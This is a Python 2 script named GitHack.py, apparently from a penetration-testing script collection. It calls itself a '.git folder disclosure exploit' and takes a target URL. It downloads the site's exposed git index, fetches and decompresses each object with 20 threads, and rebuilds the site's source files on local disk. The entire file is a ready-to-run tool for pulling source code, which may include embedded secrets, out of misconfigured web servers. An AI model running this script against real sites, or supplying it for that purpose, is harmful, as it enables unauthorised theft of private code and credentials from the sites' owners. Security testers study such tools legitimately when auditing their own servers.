PenetrationTestingScripts/Github_Leak/GitHack-master/GitHack.py

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import sys
import urllib2
import os
import urlparse
import zlib
import threading
import Queue
import re
import time
from lib.parser import parse


if len(sys.argv) == 1:
    msg = """

A `.git` folder disclosure exploit. By LiJieJie

Usage: GitHack.py http://www.target.com/.git/

bug-report: my[at]lijiejie.com (http://www.lijiejie.com)
"""
    print msg
    sys.exit(0)


class Scanner(object):
    def __init__(self):
        self.base_url = sys.argv[-1]
        self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_')
        if not os.path.exists(self.domain):
            os.mkdir(self.domain)
        print '[+] Download and parse index file ...'
        data = urllib2.urlopen(sys.argv[-1] + '/index').read()
        with open('index', 'wb') as f:
            f.write(data)
        self.queue = Queue.Queue()
        for entry in parse('index'):
            if "sha1" in entry.keys():
                self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
        self.lock = threading.Lock()
        self.thread_count = 20
        self.STOP_ME = False

    def get_back_file(self):
        while not self.STOP_ME:
            try:
                sha1, file_name = self.queue.get(timeout=0.5)
            except:
                break
            for i in range(3):
                try:
                    folder = '/objects/%s/' % sha1[:2]
                    data = urllib2.urlopen(self.base_url + folder + sha1[2:]).read()
                    data = zlib.decompress(data)
                    data = re.sub('blob \d+\00', '', data)
                    target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
                    if target_dir and not os.path.exists(target_dir):
                        os.makedirs(target_dir)
                    with open( os.path.join(self.domain, file_name) , 'wb') as f:
                        f.write(data)
                    self.lock.acquire()
                    print '[OK] %s' % file_name
                    self.lock.release()
                    break
                except urllib2.HTTPError, e:
                    if str(e).find('HTTP Error 404') >=0: break
                except Exception, e:
                    pass
        self.exit_thread()

    def exit_thread(self):
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()

    def scan(self):
        for i in range(self.thread_count):
            t = threading.Thread(target=self.get_back_file)
            t.start()


s = Scanner()
s.scan()
try:
    while s.thread_count > 0:
        time.sleep(0.1)
except KeyboardInterrupt, e:
    s.STOP_ME = True
    time.sleep(1.0)
    print 'User Aborted.'